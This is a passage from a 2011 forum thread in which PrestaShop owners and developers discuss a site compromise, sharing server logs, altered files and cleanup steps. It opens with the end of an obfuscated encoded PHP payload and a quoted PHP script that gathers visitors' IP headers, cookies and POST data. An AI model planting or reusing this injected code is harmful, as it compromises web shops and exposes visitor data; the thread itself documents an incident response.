/vN73tPTt3vHL0+9hfdm9+Oz0/rDo4M/Mvlv3sKYHvzxYPJb/ZejU6Id66WpP0qm/sH9lxdEN82p3d98mD9v/zjYPT492Xv7+nQ36Zf+C5ib0C8cn+pbgh+8P/ZVmX1YroIesSR4GZH28f14Nth9sqD63tdhqdXblvZcNG50xL68PCAklNDVPaZDkrSdpOLC0y+7N5vZwq8v+jQpCP2OGLlZNKxNMhFEd0UbsFI3ojH7NHND/3MiSt5A+Dfo8YUVhlxGHEoEutnY3PxvSlyYPbuRCH5836mBfdlAbgpuuDJeqclw2K2Lw47lt1UYpxe3VvhV0Z7lE59ux3uvj073uk+ePTtGmYkF/fBP9p2SJmRe43XfbIktLepnVUuxMv1baLpaQwoexYIQUtIWNhRCAChSIQT02EgL+dqhIkwtqhRg8+cHXRkROM4GPVqkI6fm+g7DKS3JBfKtjXgy2+jNajPfquqHiwxBhP7w2ow7mLNweFlSgqWFj6zR2Ri4lxs4ucjXMfvRMl/DTW4PsSf+66xZxJz5FfuLjUJ3xjhRFGUdGT4ro31Gfs/0BlS2lje9n9f0vmi6wbXd1vp+buu1hM2/vzv6d+iOvtkd38TlHu8mQavXdnJCbpQcpXhNbbLmZOqMopDZeNalb+VKledhCjpVAMQSQnxVIECQAfLu5KgLmwB6ehQQGNSBYjpg9g5GdBihXoaK9cDFm7oXYzcE9p+iyDp6PFz+YglbQE7EXOqLbMRTRwYu1R5CeSSqLu8vuthnVjrPo/eGFLgRPNXh7xsmiBHH1AC0T9z+AcaK5wplaYmmI8QMy6hJN6vv+H4XL9FdLFUEiippqKn6fwE='\x29\x29\x29\x3B",".");}?> <?php error_reporting(0); $empty = ""; function filt($data) { if (is_array($data)){ $datanew = ""; foreach ($data as $key=>$val) { $datanew .= htmlspecialchars(stripslashes($key)."=".stripslashes($val))."&"; } } else { $datanew = $data; $datanew = htmlspecialchars(stripslashes($datanew)); } return $datanew; } if(isset($_SERVER['HTTP_FORWARDED_FOR'])) $DATA_HTTP_FORWARDED_FOR=filt($_SERVER['HTTP_FORWARDED_FOR']); else $DATA_HTTP_FORWARDED_FOR=$empty; if(isset($_SERVER['HTTP_X_FORWARDED_FOR'])) $DATA_HTTP_X_FORWARDED_FOR=filt($_SERVER['HTTP_X_FORWARDED_FOR']); else $DATA_HTTP_X_FORWARDED_FOR=$empty; if(isset($_SERVER['HTTP_FROM'])) $DATA_HTTP_FROM=filt($_SERVER['HTTP_FROM']); else $DATA_HTTP_FROM=$empty; if(isset($_SERVER['HTTP_CLIENT_IP'])) $DATA_HTTP_CLIENT_IP=filt($_SERVER['HTTP_CLIENT_IP']); else $DATA_HTTP_CLIENT_IP=$empty; if(isset($_SERVER['HTTP_HTTP_VIA'])) $DATA_HTTP_HTTP_VIA=filt($_SERVER['HTTP_HTTP_VIA']); else $DATA_HTTP_HTTP_VIA=$empty; if(isset($_SERVER['HTTP_XROXY_CONNECTION'])) $DATA_HTTP_XROXY_CONNECTION=filt($_SERVER['HTTP_XROXY_CONNECTION']); else $DATA_HTTP_XROXY_CONNECTION=$empty; if(isset($_SERVER['HTTP_PROXY_CONNECTION'])) $DATA_HTTP_PROXY_CONNECTION=filt($_SERVER['HTTP_PROXY_CONNECTION']); else $DATA_HTTP_PROXY_CONNECTION=$empty; if(isset($_SERVER['HTTP_PROXY_USER'])) $DATA_HTTP_PROXY_USER=filt($_SERVER['HTTP_PROXY_USER']); else $DATA_HTTP_PROXY_USER=$empty; if(isset($_SERVER['HTTP_PC_REMOTE_ADDR'])) $DATA_HTTP_PC_REMOTE_ADDR=filt($_SERVER['HTTP_PC_REMOTE_ADDR']); else $DATA_HTTP_PC_REMOTE_ADDR=$empty; if(isset($_SERVER['HTTP_X_REMOTECLIENT_IP'])) $DATA_HTTP_X_REMOTECLIENT_IP=filt($_SERVER['HTTP_X_REMOTECLIENT_IP']); else $DATA_HTTP_X_REMOTECLIENT_IP=$empty; if(isset($_SERVER['HTTP_PROXY_PORT'])) $DATA_HTTP_PROXY_PORT=filt($_SERVER['HTTP_PROXY_PORT']); else $DATA_HTTP_PROXY_PORT=$empty; if(isset($_SERVER['HTTP_USER_AGENT'])) $DATA_HTTP_USER_AGENT=filt($_SERVER['HTTP_USER_AGENT']); else $DATA_HTTP_USER_AGENT=$empty; if(isset($_SERVER['HTTP_REFERER'])) $DATA_HTTP_REFERER=filt($_SERVER['HTTP_REFERER']); else $DATA_HTTP_REFERER=$empty; if(isset($_SERVER['HTTP_ACCEPT'])) $DATA_HTTP_ACCEPT=filt($_SERVER['HTTP_ACCEPT']); else $DATA_HTTP_ACCEPT=$empty; if(isset($_SERVER['HTTP_CONNECTION'])) $DATA_HTTP_CONNECTION=filt($_SERVER['HTTP_CONNECTION']); else $DATA_HTTP_CONNECTION=$empty; if(isset($_SERVER['GATEWAY_INTERFACE'])) $DATA_GATEWAY_INTERFACE=filt($_SERVER['GATEWAY_INTERFACE']); else $DATA_GATEWAY_INTERFACE=$empty; if(isset($_SERVER['REQUEST_METHOD'])) $DATA_REQUEST_METHOD=filt($_SERVER['REQUEST_METHOD']); else $DATA_REQUEST_METHOD=$empty; if(isset($_COOKIE)) $_COOKIE=filt($_COOKIE); else $_COOKIE=$empty; if(isset($_POST)) $_POST=filt($_POST); else $_POST=$empty; $data = "<pre>REQUEST_INFO_PAGE_4896485_CODE REMOTE_ADDR=".filt($_SERVER['REMOTE_ADDR'])." HTTP_CLIENT_IP=".$DATA_HTTP_CLIENT_IP." HTTP_X_FORWARDED_FOR=".$DATA_HTTP_X_FORWARDED_FOR." HTTP_X_FORWARDED=".$DATA_HTTP_FORWARDED_FOR." HTTP_X_COMING_FROM= HTTP_FORWARDED_FOR=".$DATA_HTTP_FORWARDED_FOR." HTTP_FORWARDED= HTTP_COMING_FROM= HTTP_VIA=".$DATA_HTTP_HTTP_VIA." HTTP_XROXY_CONNECTION=".$DATA_HTTP_XROXY_CONNECTION." HTTP_PROXY_CONNECTION=".$DATA_HTTP_PROXY_CONNECTION." HTTP_USER_AGENT=".$DATA_HTTP_USER_AGENT." HTTP_ACCEPT=".$DATA_HTTP_ACCEPT." HTTP_CONNECTION=".$DATA_HTTP_CONNECTION." GATEWAY_INTERFACE=".$DATA_GATEWAY_INTERFACE." REQUEST_METHOD=".$DATA_REQUEST_METHOD." HTTP_REFERER=".$DATA_HTTP_REFERER." POST=".$_POST." COOKIE=".$_COOKIE." </pre> "; echo $data; ?> Link to comment Share on other sites More sharing options...
plwm Posted August 23, 2011 Share Posted August 23, 2011 Hi, Same problem in 1.4.4 on a local install of prestashop. My apache shows that the her.php file appeared just after a serie of admin actions. Here are the last : 127.0.0.1 - - [23/Aug/2011:23:27:54 +0200] "POST [...my_local_admin]/ajax.php HTTP/1.1" 200 - "http://localhost/[...my_local_admin]/index.php" "Mozilla/5.0 (Windows NT 5.1; rv:6.0) Gecko/20100101 Firefox/6.0" 127.0.0.1 - - [23/Aug/2011:23:27:58 +0200] "POST [...my_local_admin]/ajax.php?toggleScreencast HTTP/1.1" 200 - "http://localhost/[...my_local_admin]/index.php" "Mozilla/5.0 (Windows NT 5.1; rv:6.0) Gecko/20100101 Firefox/6.0" 127.0.0.1 - - [23/Aug/2011:23:27:55 +0200] "POST /[...my_local_admin]/index.php?tab=AdminModules&token=c76a0756b0d565653ca9aabf3e5a35e HTTP/1.1" 200 301411 "http://localhost/[...my_local_admin]/index.php" "Mozilla/5.0 (Windows NT 5.1; rv:6.0) Gecko/20100101 Firefox/6.0" ---- and now the her php file------ 127.0.0.1 - - [23/Aug/2011:23:27:59 +0200] "GET /[...my_local_module_folder]/her.php HTTP/1.1" 200 - "http://localhost/_____Gedone/_Cap_Expresso/html/www2.capexpresso.com/admincap/index.php" "Mozilla/5.0 (Windows NT 5.1; rv:6.0) Gecko/20100101 Firefox/6.0" But i can't find her.php in my modules folder... And now my IE (that i rarely open) opens itself on http://ads.eorezo.com/cgi-bin/advert/getads?x_...... My two other sites (1.3.6 not upgraded to 1.4)on online servers don't seem to be affected by this problem... Link to comment Share on other sites More sharing options...
hege Posted August 23, 2011 Share Posted August 23, 2011 same problem: - e66943f1495e1631affdbddae8398209.php file in the download and upload folder - script in the footer.tpl my shop ver is 1.4.2.5 is there any modification that is have to check? if you find the solution for this hack, please tell us how can we protect the site not with just a new release (it not possible for me to update to a newer release) regards, Gabor Link to comment Share on other sites More sharing options...
SonnyBoyII Posted August 23, 2011 Share Posted August 23, 2011 Same problem... interesting thing is I have a few prestashops on my server in the same, root directory but in different folders, just one of these was attacked (PS.1.4.3)... Link to comment Share on other sites More sharing options...
ct1976 Posted August 23, 2011 Share Posted August 23, 2011 would you advise going back to an older version? replaced footer.tpl removed several dogdy looking image files for house, pharmacy, car sales in Modules\avoir\ folder??!! index.php had been amended smarty.v2 removed and now reinstated Link to comment Share on other sites More sharing options...
SonnyBoyII Posted August 23, 2011 Share Posted August 23, 2011 I forgot to mention, it happened to me before, a month ago!, I restored the whole shop and database. Unfortunately, I didn't check if there is any strange additional file or modification or not. Link to comment Share on other sites More sharing options...
AKJV Posted August 24, 2011 Share Posted August 24, 2011 I did check for other added or modified files when I discovered the hack, by searching for all files with a recent timestamp. The only, apparent, changes I could find have already been reported in this topic. In short, these are the changes: 1)a script is added to the footer.tpl file in the active theme folder 2)a php file is created in both /upload and /download folders 3).htaccess file in /download folder is deleted 4) tools/smarty/compile, tools/smarty/cache and tools/smarty_v2 are deleted (I haven't checked this myself) 5) if you're lucky enough to catch it, there is a her.php file in your /modules folder. But this file deletes itself after the hack attempt. I would advise to check all this in your own installation and if needed restore a backup of your footer.tpl, delete the alien php files, restore .htaccess file in /download folder (not necessary if this folder is empty) and restore the smarty folders. In addition, it is also important to change your password for access of your BO (though I think this info is send encrypted to the hackers but just to be safe) and to change the username/password of your database access (and change this in your BO accordingly). Also, recompile and clear the cache (enable 'Force compile' and disable 'Cache' in your 'Preferences' tab in your BO and do a refresh of your website; don't forget to revert the settings afterwards). And hopefully the Prestashop developers will find out the source of all this quickly. Link to comment Share on other sites More sharing options...
plwm Posted August 24, 2011 Share Posted August 24, 2011 same problem: - e66943f1495e1631affdbddae8398209.php file in the download and upload folder - script in the footer.tpl Idem with 1.4.4.0 on local install. Link to comment Share on other sites More sharing options...
Alaskan Posted August 24, 2011 Share Posted August 24, 2011 same problem: - e66943f1495e1631affdbddae8398209.php file in the download and upload folder - script in the footer.tpl Idem with 1.4.4.0 on local install. Same issues here. Found extra files in both download and upload folders. Tried to revert to older backup files and it added an .htaccess to one of the folders. What is the status of this situation? Does PS have a solution? This is very serious. Link to comment Share on other sites More sharing options...
J D K Posted August 24, 2011 Share Posted August 24, 2011 We were affected as well. v1.4.3. Can confirm that smarty_v2 was deleted, there was the extra files in download and upload and the footer.tpl was changed (it wasn't the default template either which was interesting). My install of PS had all the modules so I'm going through and deleting the unused ones. Link to comment Share on other sites More sharing options...
Slava Posted August 24, 2011 Share Posted August 24, 2011 server log at about 5 min. before and 5 min after her.php(17:26:00) Hope it is helpful Edit: Domain name is changed. Just for security log.txt Link to comment Share on other sites More sharing options...
jesan Posted August 24, 2011 Share Posted August 24, 2011 Hi All, I'm new to PrestaShop and just made my shop live, I was just browsing the forum and come across this Hack I checked my files and it seems I have the same problem. I deleted the .php files in the upload download folder got rid of the strange code inside the footer.tpl it appears my main htaccess file was not altered added the htaccess redir as suggested in redit I'm considering a new install but, what if I get infected again? any advice tks jesan Link to comment Share on other sites More sharing options...
ruilong Posted August 24, 2011 Share Posted August 24, 2011 Looks like there are a few similair calls made. however, it's 3 hours between. xx.xxx.xxx.xxx - - [23/Aug/2011:13:27:30 +0200] "POST /admindir/index.php?tab=AdminModules&token=8a94cca32ee3c07af0bf7322428e09cc HTTP/1.1" 200 29229 "http://www.domainname.com/admindir/index.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.2.17) Gecko/20110420 Firefox/3.6.17" yy.yyy.yy.yy - - [23/Aug/2011:16:33:36 +0200] "GET /sv/hem HTTP/1.1" 200 25448 "http://www.google.se/url?sa=t&source=web&cd=5&ved=0CEAQFjAE&url=http%3A%2F%2Fwww.domainname.com%2F&rct=j&q=domainname.com%2Bher.php&ei=rLpTTu-PG4aJrAeV6t3DDg&usg=AFQjCNFhhEF9BsO6NxutBpe4kvvZNPG1iA&cad=rjt" "Mozilla/5.0 (Windows NT 5.1; rv:6.0) Gecko/20100101 Firefox/6.0" Link to comment Share on other sites More sharing options...
titooooom Posted August 24, 2011 Share Posted August 24, 2011 I got afected too. so sad =( a lot of lost and resourses wasted. =( If need anything to solve this let me know. =) Looks like there are a few similair calls made. however, it's 3 hours between. xx.xxx.xxx.xxx - - [23/Aug/2011:13:27:30 +0200] "POST /admindir/index.php?tab=AdminModules&token=8a94cca32ee3c07af0bf7322428e09cc HTTP/1.1" 200 29229 "http://www.domainname.com/admindir/index.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.2.17) Gecko/20110420 Firefox/3.6.17" yy.yyy.yy.yy - - [23/Aug/2011:16:33:36 +0200] "GET /sv/hem HTTP/1.1" 200 25448 "http://www.google.se/url?sa=t&source=web&cd=5&ved=0CEAQFjAE&url=http%3A%2F%2Fwww.domainname.com%2F&rct=j&q=domainname.com%2Bher.php&ei=rLpTTu-PG4aJrAeV6t3DDg&usg=AFQjCNFhhEF9BsO6NxutBpe4kvvZNPG1iA&cad=rjt" "Mozilla/5.0 (Windows NT 5.1; rv:6.0) Gecko/20100101 Firefox/6.0" Link to comment Share on other sites More sharing options...
ruilong Posted August 24, 2011 Share Posted August 24, 2011 I got afected too. so sad =( a lot of lost and resourses wasted. =( If need anything to solve this let me know. =) My guess at this time is that we are dealing with some kind of malware, that has infected your computer, this malware then uses the module upload feature in Prestashop to upload this file. I would suggest the following until a more permanent fix is made. 1. Either remove write permission on modules folder, or uncomment the following code from /admin/tabs/adminModules.php function extractArchive($file) { /* global $currentIndex; $success = false; if (substr($file, -4) == '.zip') { if (!Tools::ZipExtract($file, _PS_MODULE_DIR_)) $this->_errors[] = Tools::displayError('Error while extracting module (file may be corrupted).'); } else { $archive = new Archive_Tar($file); if ($archive->extract(_PS_MODULE_DIR_)) $success = true; else $this->_errors[] = Tools::displayError('Error while extracting module (file may be corrupted).'); } @unlink($file); if ($success) Tools::redirectAdmin($currentIndex.'&conf=8'.'&token='.$this->token); */ } 2. Make sure your computer is safe! Scan for malware/viruses, use an up to date antivirus software. Make sure you have a firewall installed, even if you are behind a router, it is good to have a software firewall, especially if you use a wireless network at home or at work. Link to comment Share on other sites More sharing options...
MikeChoy Posted August 24, 2011 Share Posted August 24, 2011 Test upgrading to SVN8151 version and saw the problem. Don't think its from localhost machine. Observation: her.php file added upload dir with additional file dowload dir with additional file themes/prestashop/footer.tpl altered smarty/cache/* changed smarty/compile/* changed Categories FO not showing 3rd party homecarousel not working anymore Link to comment Share on other sites More sharing options...
jesusruiz Posted August 24, 2011 Share Posted August 24, 2011 My shop is not affected. I haven't the file her.php, nor the file footer.tpl affected. My hosting is Spanish and my shop is only available in Spanish. It is odd that affected stores, and sometimes not. Could it be that the virus appears for a module such as Facebook?. Prestashop 1.4.4 Link to comment Share on other sites More sharing options...
Rolo Tomasi Posted August 24, 2011 Share Posted August 24, 2011 OK this has just happen to me again. Yesterday my store went down and after reading this thread, I deleted the php file in the upload/download folders and reverted to the original footer file. I also had to reinstall the tools/smarty/compile and tools/smarty/cache folders along with smarty_v2 folder. After this everything seemed OK. This morning exactly the same thing has happened again. This needs sorting ASAP. Link to comment Share on other sites More sharing options...
thehandlestudio Posted August 24, 2011 Share Posted August 24, 2011 I have just had my site restored by my host Vidahost I had tried to replace the tools directory and I still had problems with the log in page as there was a security error coming up in browser. So the only way that would eliminate this was to restore all the files and everything seems back to normal now. Regards, Mark. Link to comment Share on other sites More sharing options...
trippodo Posted August 24, 2011 Share Posted August 24, 2011 I checked my store files and it seems I have the same problem. I deleted the .php files in the upload and download folder and restored footer.tpl i have also deleted all files in smarty/cache and smarty/compile I did not find the file her.php in modules folder prestashop 1.4.4.0 Link to comment Share on other sites More sharing options...
Carl Favre Posted August 24, 2011 Share Posted August 24, 2011 As Mike said, the whole team is working on this issue. We are trying to fix it as fast as possible. We will keep you informed of any progress. Be assured that we do not take this problem lightly and that we are totally dedicated to fixing it. Link to comment Share on other sites More sharing options...
dazzza Posted August 24, 2011 Share Posted August 24, 2011 Just checked my sites & my clients sites & it seems to be only 1.4.3 & 1.4.4 affected so far. One site is in maintenance mode & was still affected. I'm now going to try a clean install on wamp & see what the logs say after. Link to comment Share on other sites More sharing options...
Raphaël Malié Posted August 24, 2011 Share Posted August 24, 2011 Hello, can you search in your full log apache the word "her.php" and copy all found lines here ? If you are under linux : cat /path/to/your/apache/log | grep "her.php" Link to comment Share on other sites More sharing options...
Julien Breux Posted August 24, 2011 Share Posted August 24, 2011 Hi all, I run an audit on my customers and partners. I hope that isn't my menu but above all isn't PrestaShop ! Ju' Link to comment Share on other sites More sharing options...
Ruben86 Posted August 24, 2011 Share Posted August 24, 2011 Same problems here! The shop went offline after my smarty_v2 folder content was removed. I can't find her.php. Already any suggestions for a fix? Link to comment Share on other sites More sharing options...
Raphaël Malié Posted August 24, 2011 Share Posted August 24, 2011 Hello, for all people affected by this problem, if possible we need your apache log to check how this issue happened on your site and try to correct it the faster possible. You can send your logs to Carl. Regards Link to comment Share on other sites More sharing options...
dazzza Posted August 24, 2011 Share Posted August 24, 2011 (edited) Last entry line in Apache log after local install on wamp 127.0.0.1 - - [24/Aug/2011:10:31:57 +0200] "GET /test_virus/modules/her.php HTTP/1.1" 200 - Then the her.php has gone but footer.tpl has been modified. PrestaShop 1.4.4 BTW this was a clean install with no extra modules. Zip downloaded from PrestaShop on 20/08/11 Edited August 24, 2011 by dazzza (see edit history) Link to comment Share on other sites More sharing options...
PurpleEdge Posted August 24, 2011 Share Posted August 24, 2011 Hello, for all people affected by this problem, if possible we need your apache log to check how this issue happened on your site and try to correct it the faster possible. You can send your logs to Carl. Regards Attached is my log from this morning. I installed niceforms and jbx_menu modules yesterday onto other sites on local host - these sites use the default theme and weren't affected. I installed jbx_menu on this site this morning and shortly after the footer.tpl file in a custom theme was affected. I can upload earlier logs if necessary - there is no other reference to her.php in my logs. PurpleEdge.zip Link to comment Share on other sites More sharing options...
guest* Posted August 24, 2011 Share Posted August 24, 2011 I'm using jbx_menu as well... Can all the people who have posted here and encountered the same problem confirm that they are using this menu? I use the blocktopmenu from JBX too. No hack at all. BUT I run on an IIS (no Apache) which has no .htaccess so the script will not work, I too use a module called protect.tpl from samhda. It helps to protect your theme if script name are not known... I use Geo-Targeting to block all the countries I don't sell to and for known bad-behaviour countries (listed on project honeypot or other similar.) I run several bot-traps and firewall security on my server, because I've had a hacked server in the past with php-BB-forum software. The security theme is a wide complexe theme and it does not mean that file xy was hacked, that this file was the reason for the hack. In most cases some other open JS are the reason for intrusions AND no software is really secure... You must make your server secure to be not hacked. Link to comment Share on other sites More sharing options...
Maxence de Flotte Posted August 24, 2011 Share Posted August 24, 2011 I can upload earlier logs if necessary - there is no other reference to her.php in my logs. I found it on line 256: 127.0.0.1 - - [24/Aug/2011:09:44:13 +1000] "GET /ozhealth_local/modules/her.php HTTP/1.1" 200 - Thanks for all these details. Best regards, Link to comment Share on other sites More sharing options...
spott Posted August 24, 2011 Share Posted August 24, 2011 Hi One of my costumer has the same problem. I restored his site. Right now I don't have server logs to look, when and how the her.php file was added. Link to comment Share on other sites More sharing options...
MikeChoy Posted August 24, 2011 Share Posted August 24, 2011 This is my test finding. Using SVN version_8151 to do a fresh installation (localhost) Immediately after installation...access FO ---> no her.php file found Then try access to BO by keying in password ---> her.php file was generated No other files found in upload and download directory Footer.tpl not altered ==continuing with further monitoring & testing Please find attached access.log for your investigation. access.txt Link to comment Share on other sites More sharing options...
dazzza Posted August 24, 2011 Share Posted August 24, 2011 Local host site on wamp connects to erabaglanti.ka.hn & the little square at the bottom is an iframe from http://clickmeml.fileave.com Link to comment Share on other sites More sharing options...
Huot Sébastien Posted August 24, 2011 Share Posted August 24, 2011 Same problem here, i found it when the function slidetoggle didn't work anymore.. Lucky me Any fix or updates ? Link to comment Share on other sites More sharing options...
jLangevin Posted August 24, 2011 Share Posted August 24, 2011 Hi, I have 3 stores 1 has been infected version 1.4.3 site was in maintenance mode new php files in upload and download smarty_v2 erased footer.tpl altered can't find her.php Link to comment Share on other sites More sharing options...
emilioSH Posted August 24, 2011 Share Posted August 24, 2011 sorry Link to comment Share on other sites More sharing options...
Raphaël Malié Posted August 24, 2011 Share Posted August 24, 2011 Hello, for those who can reproduce this bug in localhost, can you please remade an install, and before you do any action on your prestashop please add the following code : if ($_POST) { $fd = fopen(_PS_ROOT_DIR_.'/log_her.txt', 'a'); fwrite($fd, var_export($_POST, true).var_export($_SERVER, true)."\n"); fclose($fd); } bellow the code function __construct() { in file admin/tabs/adminModules.php. Once you have noticed the presence of her.php infection, please send me per MP the log file her_log.txt in your Prestashop root folder, thank you Link to comment Share on other sites More sharing options...
ElRapazGrande Posted August 24, 2011 Share Posted August 24, 2011 I have the problem too on a 1.4.4 Prestashop. Found it yesterday at about 6pm Paris time. I removed my active theme directory by FTP, I uploaded a clean one, it worked again, but this morning it was infected again. Link to comment Share on other sites More sharing options...
Klixin Posted August 24, 2011 Share Posted August 24, 2011 I got hacked too, website comes up with error 500. I deleted the sus files as mentioned but I still get error 500. How do I fix to get my client back online? error log: [24-Aug-2011 17:22:00] PHP Fatal error: require_once() [<a href='function.require'>function.require</a>]: Failed opening required '/home/thumpmus/public_html/tools/smarty_v2/Smarty.class.php' (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/thumpmus/public_html/config/smarty.config.inc.php on line 33 Link to comment Share on other sites More sharing options...
Vincent Schoener Posted August 24, 2011 Share Posted August 24, 2011 I'm curious for those infected what operating system you use ? But as said Raphael, it's coming after the call of AdminModule We keep you informed about any news. Best regards Link to comment Share on other sites More sharing options...
Maxence de Flotte Posted August 24, 2011 Share Posted August 24, 2011 I got hacked too, website comes up with error 500. I deleted the sus files as mentioned but I still get error 500. How do I fix to get my client back online? error log: [24-Aug-2011 17:22:00] PHP Fatal error: require_once() [<a href='function.require'>function.require</a>]: Failed opening required '/home/thumpmus/public_html/tools/smarty_v2/Smarty.class.php' (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/thumpmus/public_html/config/smarty.config.inc.php on line 33 Hi, Try to re-upload your prestashop. And check: - /tools/smarty_v2/ exists - /modules/her.php do NOT exists Best regards, Link to comment Share on other sites More sharing options...
thehandlestudio Posted August 24, 2011 Share Posted August 24, 2011 I'm curious for those infected what operating system you use ? But as said Raphael, it's coming after the call of AdminModule We keep you informed about any news. Best regards Hi Vincent, I am using a linux operating system if that helps. Regards, Mark. Link to comment Share on other sites More sharing options...
jLangevin Posted August 24, 2011 Share Posted August 24, 2011 I'm curious for those infected what operating system you use ? I'm working on OSX 10.5.8 and for hosting this is Linux Apache/2.2.14 (Unix) PHP: 5.2.5 MySQL: 5.1.44 Thanks Link to comment Share on other sites More sharing options...
Raphaël Malié Posted August 24, 2011 Share Posted August 24, 2011 Hello, for those who can reproduce this bug in localhost, can you please remade an install, and before you do any action on your prestashop please add the following code : if ($_POST) { $fd = fopen(_PS_ROOT_DIR_.'/log_her.txt', 'a'); fwrite($fd, var_export($_POST, true).var_export($_SERVER, true)."\n"); fclose($fd); } bellow the code function __construct() { in file admin/tabs/adminModules.php. Once you have noticed the presence of her.php infection, please send me per MP the log file her_log.txt in your Prestashop root folder, thank you Link to comment Share on other sites More sharing options...
Johann Posted August 24, 2011 Share Posted August 24, 2011 Also infected on at least two sites (1.4.4.0), but apparently not all my PS sites. But I have to ftp access at the office... One of the infected sites has absolutety no additional modules (it's a test site). Hosted on a Linux Debian OS. Websites uploaded from my Windows 7 (with MS Essential Security) and Filezilla. Link to comment Share on other sites More sharing options...
Recommended Posts